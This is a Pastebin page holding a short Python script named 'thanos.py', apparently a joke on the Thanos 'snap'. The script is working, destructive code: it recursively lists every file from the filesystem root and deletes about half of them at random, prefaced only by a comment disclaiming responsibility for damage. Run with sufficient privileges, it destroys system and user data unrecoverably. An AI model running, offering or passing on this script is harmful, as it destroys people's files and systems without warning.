BrinkerVII

thanos.py

Feb 21st, 2020
227
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.23 KB | None | 0 0
  1. #!/usr/bin/python3
  2. # The author of this script is not responsible for any damage
  3. import glob
  4. import os
  5. import random
  6.  
  7. for file in filter(lambda _: random.randint(0, 100) >= 50, glob.glob("/**", recursive=True)):
  8.     os.remove(file)
Advertisement
Add Comment
Please, Sign In to add comment